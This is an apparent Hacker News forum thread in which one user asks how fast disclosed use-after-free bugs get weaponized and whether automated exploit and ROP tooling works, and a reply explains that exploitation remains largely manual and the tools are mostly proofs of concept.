by lopsidedBrain on 11/1/20, 2:46 AM with 1 comments
Once a typical use-after-free vulnerability is disclosed publicly, for example, how quickly does it get weaponized? I remember reading some academic papers a while back, which claimed to be able to automatically generate exploits from a patch. I believe ROP compilers exist also that will take some logic and string it together with a given set of gadgets in a binary. What is the current state of all that tooling?
Bottomline: Are there stats (e.g. from honeypots) that tell us the likelihood of a typical laptop/mobile user being compromised based on a given security flaw, given the amount of time they run unpatched after disclosure?
I figured there must be experts here who have been keeping up with all of this better than I have. I'd love to hear from you all!
by kdbg on 11/1/20, 9:05 PM
The process of going from a bug to a weaponized exploit though is still largely manual. Yes some tooling exists that may automate certain tasks, however these tools often only work as proof of concepts. ROP compilers are a great example, they "work" but they are are usually far more prone to crashing than one compiled by hand, as such wouldn't be used in the real world.
Thats just kinda the general truth, ignoring the many cases where the automated offering just don't work at all, when they do its often not weaponized to a useful degree. You might thing that you could then use what it does as a starting place, but it takes a lot of time to now reverse what the script did and figure out what can/should be changed, similar to having just done it yourself in the first place and not being constrained.
That said there has been some research in augmenting the workflow by discovering exploit strategy candidates. I forget the name right now, but there was a paper early this year presenting a capability guided fuzzer that focused on "fuzzing" OOB Write vulns to expand them and discover viable exploit strategies for them.